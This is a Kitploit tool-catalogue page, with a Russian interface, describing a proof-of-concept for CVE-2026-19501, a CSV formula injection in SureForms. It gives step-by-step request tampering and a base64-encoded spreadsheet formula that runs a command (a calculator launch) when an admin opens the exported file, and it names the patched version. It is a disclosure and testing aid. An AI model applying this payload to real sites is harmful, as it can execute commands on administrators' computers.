Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-19501-poc — Proof-of-concept for unauthenticated CSV formula injection in SureForms, showing crafted form submissions trigger spreadsheet formulas when exported by admins. | Kitploit
Инструменты/GitHubGitHub/typedefabcd1234ntd/cve-2026-19501-poc
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationWeb SecurityPenetration Testing
GitHubtypedefabcd1234ntd/cve-2026-19501-poc

CVE-2026-19501-poc

Proof-of-concept for unauthenticated CSV formula injection in SureForms, showing crafted form submissions trigger spreadsheet formulas when exported by admins.

Репозиторий
422 дней назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Контент недоступен на запрошенном языке. Показываем английскую версию.

CVE-2026-19501 Poc

Description:

Sureforms is vulnerabale to a unauthenticated CSV injection vulnerability when attacker can inject a CSV formula when submit a form. This formula will be excuted when admin export CSV file and open it.

Step to reproduce:

Step 1: Submit a form and then intercept the submit request

Step 2: Change the body line which include a key "srfm-input..." to

root@kitploit:~
<randomtext>-lbl-<the formula in base 64>: <the content>

Example:

root@kitploit:~
abcdef-lbl-PTIrNStjbWR8JyAvQyBjYWxjJyFBMA==

Step 3: Send the submit request and wait the payload to exploit when admin export and open the CSV file

How to fix

Updates to the latest version (2.12.3 or later) to solve this issue

Note

If you feel this write-up here great and interesting, you contribute me in my Github Sponsor.

Скачать инструмент